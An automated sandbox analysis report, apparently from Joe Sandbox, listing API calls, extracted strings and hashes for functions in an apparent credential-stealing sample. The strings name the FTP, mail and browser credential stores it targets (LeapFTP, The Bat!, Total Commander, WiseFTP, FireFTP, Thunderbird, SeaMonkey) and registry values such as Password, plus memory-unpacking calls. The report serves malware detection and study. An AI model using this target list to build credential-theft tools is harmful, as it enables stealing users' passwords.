                                                • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                                • API String ID: 3062143572-138716004
                                                • Opcode ID: dee2d00840e4c69ac92f84b52ac7d8150928e46feabd8bc2b351fb67c65ae42e
                                                • Instruction ID: bd4aa642c6eb53d7b9c00ec68b8433f5a3b9b95189823f5fba1e955bc3a480ca
                                                • Opcode Fuzzy Hash: dee2d00840e4c69ac92f84b52ac7d8150928e46feabd8bc2b351fb67c65ae42e
                                                • Instruction Fuzzy Hash: 8A11EF70784218BEDB11AB62CC87FD97A759B40708F60C0A6B648750E3DBBDCAD19B4D
                                                APIs
                                                • StrStrA.SHLWAPI(0084DAA8,unleap.exe), ref: 004078EB
                                                • lstrlenA.KERNEL32(unleap.exe,00000001,0084DAA8,unleap.exe), ref: 00407904
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                                  • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                                  • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                • StrStrIA.SHLWAPI(00849868,leapftp,0084DAA8,unleap.exe), ref: 00407948
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
                                                • API String ID: 1884169789-1497043051
                                                • Opcode ID: 0bd7889019541237edf07f4bd8fd4bcd8c91632b2d1955a5437dfcf88fff1b7d
                                                • Instruction ID: 587d092347e02f9e7962a8cbc65e01c2016c5b541c46329675d4887270a6c82e
                                                • Opcode Fuzzy Hash: 0bd7889019541237edf07f4bd8fd4bcd8c91632b2d1955a5437dfcf88fff1b7d
                                                • Instruction Fuzzy Hash: FC21A2B1644204BDFB123B71CC06FEA3E1AAB81354F20853BB905B51E2E7BC5D9196AD
                                                APIs
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                • wsprintfA.USER32 ref: 0040EE6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLocalwsprintf
                                                • String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
                                                • API String ID: 988369812-1921698578
                                                • Opcode ID: bd5cfd4729ccf78e2b14c8987cec553748ba070bc45ee8b3e31b11adccab183c
                                                • Instruction ID: e750723d76c73536ddc8d51081a3667551c4aa25361badb92b68cc5b625c7140
                                                • Opcode Fuzzy Hash: bd5cfd4729ccf78e2b14c8987cec553748ba070bc45ee8b3e31b11adccab183c
                                                • Instruction Fuzzy Hash: EB31D635D0020DFADF11ABA2DC42A9E7B76AF04344F60897BB414B51E1D7B99B60AA48
                                                APIs
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404ABC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocDirectoryLocalWindows
                                                • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                                                • API String ID: 3186838798-3636168975
                                                • Opcode ID: f98ef943dc5ecdf4fe6de66f6584d2e8d300c6dc30459f4818816504d7116737
                                                • Instruction ID: e12406a4063c388e426f80d96e1c55e83aebae4117be8ddaeedfdc1085b672af
                                                • Opcode Fuzzy Hash: f98ef943dc5ecdf4fe6de66f6584d2e8d300c6dc30459f4818816504d7116737
                                                • Instruction Fuzzy Hash: 9D41CDB1A80605BAEF123B71CC43FDE7E259F80754F20417B7A14B40F6DABD9A509A5C
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00404772
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004047A6
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004048CD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: HostName$Password$User
                                                • API String ID: 1332880857-1253078594
                                                • Opcode ID: a9edcef85e703cf29bd117596f725d26320b9b8c2277babcdd567046530c79ac
                                                • Instruction ID: db40dad78a2ba0b83d513b2a7ff2eedcfb1ea977825c3c17440cf38f82ee02d9
                                                • Opcode Fuzzy Hash: a9edcef85e703cf29bd117596f725d26320b9b8c2277babcdd567046530c79ac
                                                • Instruction Fuzzy Hash: A631E57184011CBADF227B61CC42BDD7AB9BF40304F50C5BAB648740B1CBB95B929F88
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408C5A
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408C8E
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408D80
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
                                                • API String ID: 1332880857-3184955129
                                                • Opcode ID: 4701b45774f992d88d65b4443a3adb1511bb1d8421c0b81ddb5c335998bbd9a2
                                                • Instruction ID: 9a22b476d29900e44ea1d58df917a9250a7719ae7ca8e7b5c489c9b18f449501
                                                • Opcode Fuzzy Hash: 4701b45774f992d88d65b4443a3adb1511bb1d8421c0b81ddb5c335998bbd9a2
                                                • Instruction Fuzzy Hash: 9031E77190010CBADF216F61CD42FDD7ABABF10344F50C4BAB548B40E1DE799A91AF98
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409C62
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409CA7
                                                  • Part of subcall function 00401C93: lstrlenA.KERNEL32(?), ref: 00401CB4
                                                  • Part of subcall function 00401C93: lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
                                                  • Part of subcall function 00401C93: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
                                                  • Part of subcall function 00401C93: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                                                • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                                                • API String ID: 3007406096-624000163
                                                • Opcode ID: 4205abf1ae99089d99fdde2c5ac3b2e758e1189a6140887c775feb9597ca6d8e
                                                • Instruction ID: a48b09e3ff263b956425435e1e973b4a862e31945ba7e1c7766568fe2e47dd34
                                                • Opcode Fuzzy Hash: 4205abf1ae99089d99fdde2c5ac3b2e758e1189a6140887c775feb9597ca6d8e
                                                • Instruction Fuzzy Hash: 55011E707802087ADB117F61CC47FDD7A299B40749F61807ABA04750E3DABDDAD09A5D
                                                APIs
                                                • VirtualProtect.KERNEL32(00000000,-00000001,?,00000040), ref: 006100AE
                                                • VirtualProtect.KERNEL32(00000000,?,00000040,00000040), ref: 00610130
                                                • VirtualProtect.KERNEL32(00000000,-00000001,?,00000040), ref: 00610322
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.1684799843.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_610000_8WgZHDQckx.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID: @$@$zL
                                                • API String ID: 544645111-2217806029
                                                • Opcode ID: c60573fa20f832fa536501792543f4d8d3be2452eda2f2eaa3e02385dc478f35
                                                • Instruction ID: 7d4256c3c6addb2020e5fdbd427e3beba80e166ffb9a0b3fe6fa51a68004c5eb
                                                • Opcode Fuzzy Hash: c60573fa20f832fa536501792543f4d8d3be2452eda2f2eaa3e02385dc478f35
                                                • Instruction Fuzzy Hash: B5519175D01208EFDF09CF98D995ADDBBB2BF88301F288159E8056B359D734AA81CF94
                                                APIs
                                                • StrStrIA.SHLWAPI(?,?), ref: 00409A82
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                                  • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                                  • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                                  • Part of subcall function 00401C93: lstrlenA.KERNEL32(?), ref: 00401CB4
                                                  • Part of subcall function 00401C93: lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
                                                  • Part of subcall function 00401C93: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
                                                  • Part of subcall function 00401C93: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                                                • String ID: PathToExe
                                                • API String ID: 3012581338-1982016430
                                                • Opcode ID: 2289f49dd118580c98bbccf2d357f7e95b01b49dda2c0e7527473f5d09d8cc53
                                                • Instruction ID: 1d76cd23fb074dc89dad06d858ab6b246b3fa36e68aacfab6f2579017d8d32a0
                                                • Opcode Fuzzy Hash: 2289f49dd118580c98bbccf2d357f7e95b01b49dda2c0e7527473f5d09d8cc53
                                                • Instruction Fuzzy Hash: 0D31DB31D50109BAEF11AFA1CC42EEE7E75BF04344F50443AB610B41F2DBB99A60AB69
                                                APIs
                                                • GetTempPathA.KERNEL32(00000104,?), ref: 00402674
                                                • GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004026F6
                                                • GlobalLock.KERNEL32(?), ref: 00402702
                                                • GlobalUnlock.KERNEL32(?), ref: 00402724
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
                                                  • Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
                                                  • Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
                                                  • Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87
                                                  • Part of subcall function 00401C93: lstrlenA.KERNEL32(?), ref: 00401CB4
                                                  • Part of subcall function 00401C93: lstrlenA.KERNEL32(00000000,?), ref: 00401CBE
                                                  • Part of subcall function 00401C93: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401CD2
                                                  • Part of subcall function 00401C93: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401CDB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$Global$lstrcatlstrcpy$FromLockPathStreamTempUnlock
                                                • String ID: Software\WinRAR
                                                • API String ID: 2536169780-224198155
                                                • Opcode ID: 1a0aa574539de05215a3ce9fdb3959ce73ebeff3f84587210906ef20e334f391
                                                • Instruction ID: 7ce4eb711e86f92b68206b460616100140319674e48074a54c1daa36c09b920a
                                                • Opcode Fuzzy Hash: 1a0aa574539de05215a3ce9fdb3959ce73ebeff3f84587210906ef20e334f391
                                                • Instruction Fuzzy Hash: BE21EB71D0010DBBDF11ABB1CD86DDE7B69AF04348F1044B6B604F61F2D6BD8A90AB18
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00404664
                                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 0040469D
                                                • StrStrIA.SHLWAPI(?,Line), ref: 004046CE
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000001,00000000,00000000,?,Line), ref: 00404753
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpenValue
                                                • String ID: Line
                                                • API String ID: 4012628704-1898322888
                                                • Opcode ID: 7cba35f3077d9f48ee68726b6cc6e3e229af39bee818edf4340032195014823b
                                                • Instruction ID: be7aa309fd3f993b02d7590f1dd93621f343519f9d7ecdca5b31e4b1a8e2e83c
                                                • Opcode Fuzzy Hash: 7cba35f3077d9f48ee68726b6cc6e3e229af39bee818edf4340032195014823b
                                                • Instruction Fuzzy Hash: ED212AB180010CBACF21AB50CC41BED7BB9BF41304F1085B6F605B50A0DBBA9B959F99
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E1BE
                                                • RegEnumValueA.ADVAPI32(?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E1F7
                                                • StrStrIA.SHLWAPI(?,.wjf), ref: 0040E23E
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,?,00000000,00000000,?,?,?), ref: 0040E26B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpenValue
                                                • String ID: .wjf
                                                • API String ID: 4012628704-198459012
                                                • Opcode ID: f16434eb568557e5d773a2e30f854150d0129578811892dcd54a2da775d95354
                                                • Instruction ID: 83cd423dfab7f3ce78523b2e43c96a3224d61868d9a123fb196da80e76c6a25e
                                                • Opcode Fuzzy Hash: f16434eb568557e5d773a2e30f854150d0129578811892dcd54a2da775d95354
                                                • Instruction Fuzzy Hash: 3811E43180410CBADF11AB91CC41AEEBBBDBF04304F0089B6A515B40A1DBB99BA59F99
                                                APIs
                                                  • Part of subcall function 0040263E: GetTempPathA.KERNEL32(00000104,?), ref: 00402674
                                                  • Part of subcall function 0040263E: GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004026F6
                                                  • Part of subcall function 0040263E: GlobalLock.KERNEL32(?), ref: 00402702
                                                  • Part of subcall function 0040263E: GlobalUnlock.KERNEL32(?), ref: 00402724
                                                • CoCreateGuid.OLE32(?,00000000), ref: 004043D0
                                                • wsprintfA.USER32 ref: 00404417
                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404423
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$CreateFromGuidLockPathStreamTempUnlocklstrlenwsprintf
                                                • String ID: HWID${%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                                • API String ID: 1852535927-1100116640
                                                • Opcode ID: 678afb478dcb297b9a40c82344ed684fe2d6c6816f2cb1cf3ba5bb659b5642fa
                                                • Instruction ID: 39eda57d1e4ded13cf2467c53634863ea40b69290cc94bf288a4a0d6a76da2b3
                                                • Opcode Fuzzy Hash: 678afb478dcb297b9a40c82344ed684fe2d6c6816f2cb1cf3ba5bb659b5642fa
                                                • Instruction Fuzzy Hash: 4C1127A68041987DDB61D2E64C51DFFBAFC5D0D205B5800ABBAA0F20C2D67D87409B38
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409CE9
                                                  • Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
                                                  • Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
                                                  • Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
                                                  • Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409D2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
                                                • API String ID: 3062143572-164276155
                                                • Opcode ID: cfeefedc208ba1b3a158d02969ec9bf6b73c8418a662f19825f7b3feef0c061e
                                                • Instruction ID: 5655a4762ef1ec6e9dd1e1728c7ffd47c60bddb1b6fa57ef8374201fc086bd1c
                                                • Opcode Fuzzy Hash: cfeefedc208ba1b3a158d02969ec9bf6b73c8418a662f19825f7b3feef0c061e
                                                • Instruction Fuzzy Hash: 56F01D70780208BACB11BF61DC47FC97A659B14B48F61C06AB609750E6DAB9CAD09B4D
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409D70
                                                  • Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
                                                  • Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
                                                  • Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
                                                  • Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409DB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: Flock$Software\Mozilla$\Flock\Browser\
                                                • API String ID: 3062143572-1276807325
                                                • Opcode ID: 3f712649621526bde9587fe4487f4491b0f00e7a5a129f20ff6db4e6b027a248
                                                • Instruction ID: 09e756c12b8c31d393a996039f8f363fea179afbecdec63c6c31eda142224f35
                                                • Opcode Fuzzy Hash: 3f712649621526bde9587fe4487f4491b0f00e7a5a129f20ff6db4e6b027a248
                                                • Instruction Fuzzy Hash: B6F0BD74B40208BADB11BF62CC43FC97A659B04748F618066BA08751E2DAB9DBD09B5D
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409DF7
                                                  • Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
                                                  • Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
                                                  • Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
                                                  • Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409E3C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                                                • API String ID: 3062143572-2716603926
                                                • Opcode ID: d39e9b962fab1e5d7928343fc2e4ed07076092eef11679877b92ec2f860963f9
                                                • Instruction ID: 8905593ad34adf5734f7ff0091e5010f1ee6da67e115286792317178a7508775
                                                • Opcode Fuzzy Hash: d39e9b962fab1e5d7928343fc2e4ed07076092eef11679877b92ec2f860963f9
                                                • Instruction Fuzzy Hash: AAF01D74740208BACB11BF61CC47FC97A669B40708F61C066B608750E2DEB9DAD09B4D
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409BAC
                                                  • Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
                                                  • Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
                                                  • Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
                                                  • Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409BF1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
